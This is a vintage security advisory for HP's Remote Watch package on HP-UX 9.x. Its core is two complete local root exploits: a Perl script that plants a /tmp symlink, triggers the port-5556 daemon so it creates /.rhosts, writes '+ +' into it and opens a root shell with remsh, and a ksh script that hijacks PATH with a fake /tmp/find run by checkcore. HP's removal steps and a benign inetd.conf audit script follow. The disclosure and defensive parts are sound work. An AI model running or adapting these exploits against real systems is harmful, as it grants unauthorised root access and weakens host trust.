COMMAND

    /usr/remwatch/* (Remote Watch)

SYSTEMS AFFECTED

    HP 9000 series 300/400/700/800s

PROBLEM

    The Remote Watch package is a system management tool whose
    capabilities have been largely incorporated in the System
    Administration Manager (SAM).  Two vulnerabilities in HP Remote
    Watch exist that allow users to gain root access.  The first is
    via a socket connection on port 5556.  The second is a result of
    using the showdisk utility, which is part of the Remote Watch
    product.  See the two exploits below.

------------------------------------------------------------------------------
#!/usr/bin/perl

# displays a problem with RemoteWatch use of /tmp to store filestuffs
# SOD - June 96

use Socket;
use FileHandle;

$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }

STDOUT->autoflush();

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

if (-f "/.rhosts") {
  print "/.rhosts exists!  Cannot spooge...\n";
  print "(but I can be used to make ANY root owned world writable file...)\n";
  exit;
  }


print "This program will attempt to put + + into /.rhosts\n";
system("rm -rf /tmp/iconTmpUpdate");
chop($host=`hostname`);
mkdir("/tmp/iconTmpUpdate",0777);
mkdir("/tmp/iconTmpUpdate/$host",0777);
chmod(0777,"/tmp/iconTmpUpdate","/tmp/iconTmpUpdate/$host");
symlink("/.rhosts","/tmp/iconTmpUpdate/$host/done")||die "$!: cannot symlink";

$port=5556;
shift(@ARGV);
($name, $aliases, $proto) = getprotobyname('tcp');
($name, $aliases, $type, $len, $thataddr) = gethostbyname($host);
$that=pack('S n a4 x8', AF_INET, $port, $thataddr);

socket(S,PF_INET,SOCK_STREAM,$proto)|| die "socket: $!";
connect(S,$that) || die "connect: $!";
S->autoflush();

# 20 20 31 7a gives back a 0x6f(111) -- meaning WHAT exactly?
#print S h2cs("2020317a");

# 20 20 31 5a gives back 0 0 5 0xa(10) -- gah?
print S h2cs("202031");
print S chr(117);
print "Please wait";
while($c=getc(S)) {
  print ".";
  }
close(S);

$n=0;
while($n++<6) {
  print "\nOK...";
  last if (-f "/.rhosts");
  sleep 1;
  }
print "\n";
open(R,">>/.rhosts");
print R "+ +\n";
close(R);
print "Testing out your root shell...\n";
system("remsh $host -l root sh -i");
exit;

STDOUT->autoflush();

if ($child = fork) {
  while (<>) { print S; }
  sleep 3;
  do dokill();
  } else {
  while (<S>) { print; }
  }
close(S);
exit;
------------------------------------------------------------------------------

    or you can try this one,

------------------------------------------------------------------------------
#!/bin/ksh

# SOD (as of 06/11/96)
# same sorta bug, different file.

if [ ! -x /usr/remwatch/bin/fmon/checkcore ]
then
  echo This is an exploit for the checkcore utility internal to
  echo HP\'s Remote Watch series of programs.
  echo The checkcore utility doesn\'t appear to be on your system.
  echo Moo
  exit
fi

PGM=$*

if [ -z "${PGM}" ]
then
  PROGGIE=`basename $0`
  echo "${PROGGIE}: I will run a shell for you"
  PGM="/bin/ksh -i"
fi

TTY=`tty`

echo '#!/bin/ksh' > /tmp/find
echo "${PGM} >> ${TTY} 2>&1" >> /tmp/find
chmod 777 /tmp/find
PATH=/tmp:$PATH
export PATH
/usr/remwatch/bin/fmon/checkcore > /dev/null 2>&1
rm /tmp/find
------------------------------------------------------------------------------

SOLUTION

    Do not use Remote Watch.  These files cannot be patched but
    should be removed, as recommended in HP Security Advisory
    #9610-039.

    This vulnerability  can only  be eliminated  from releases  9.X of
    HP-UX  which  are  using  Remote  Watch  by  disabling  the entire
    product.  The default location for this product is /usr/remwatch/.
    Removal can be accomplished (as root) with the following:

    NOTE: Do not  run the standard  rmfn command as  HP has discovered
    problems  with  its  inability  to  handle  programs  with  active
    executables.

    Instead, run (with no options):

	/usr/remwatch/bin/removeall

    This  runs  a  Remote  Watch  script  called "unconfigure" to stop
    actively  running  programs,  then  proceeds  to  remove all files
    including the filesets.

    The administrator should also perform both of the following steps:

    1.  Remove or comment  out the following entry in  /etc/inetd.conf
	file:

    rwdaemon stream tcp nowait root /usr/remwatch/bin/rwdaemon rwdaemon

    2.  Have inetd re-read its configuration file by executing at  the
	prompt:

	inetd -c

    This is the official recommendation from Hewlett-Packard Company.
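    The steps above can be checked and applied from a script.  The
    following is an added example (not part of the advisory and not
    HP's code): it looks for an active rwdaemon entry in an inetd.conf
    file, writes a copy with that entry commented out, and reports
    whether the /usr/remwatch directory is still present.  It runs
    against a constructed sample file so it can be tried offline; on a
    real HP-UX 9.x host you would point it at /etc/inetd.conf as root
    and then run "inetd -c" as the advisory says.

```shell
#!/bin/sh
# Audit helper for the Remote Watch removal steps (added example, not HP's code).
# Works on file paths so it can be exercised against a constructed sample.

# Succeed (exit 0) if $1 contains an uncommented rwdaemon inetd entry.
rwdaemon_active() {
    grep -q '^[^#]*[[:space:]]/usr/remwatch/bin/rwdaemon' "$1"
}

# Write a copy of $1 to $2 with every active rwdaemon entry commented out.
# Lines that are already comments are left untouched, so it is safe to rerun.
disable_rwdaemon() {
    sed 's|^\([^#].*/usr/remwatch/bin/rwdaemon.*\)$|# \1|' "$1" > "$2"
}

# Succeed if the Remote Watch install directory ($1, default /usr/remwatch) exists.
remwatch_present() {
    [ -d "${1:-/usr/remwatch}" ]
}

# Constructed sample inetd.conf (not taken from any real host).
SAMPLE=$(mktemp)
FIXED=$(mktemp)
trap 'rm -f "$SAMPLE" "$FIXED"' EXIT
cat > "$SAMPLE" <<'EOF'
# constructed sample inetd.conf
ftp    stream tcp nowait root /usr/lbin/ftpd    ftpd -l
telnet stream tcp nowait root /usr/lbin/telnetd telnetd
rwdaemon stream tcp nowait root /usr/remwatch/bin/rwdaemon rwdaemon
EOF

if rwdaemon_active "$SAMPLE"; then
    echo "active rwdaemon entry found in $SAMPLE; writing disabled copy to $FIXED"
    disable_rwdaemon "$SAMPLE" "$FIXED"
    echo "after edit, reload inetd with: inetd -c"
else
    echo "no active rwdaemon entry in $SAMPLE"
fi

if remwatch_present; then
    echo "/usr/remwatch still exists; run /usr/remwatch/bin/removeall as root"
else
    echo "/usr/remwatch not present"
fi
```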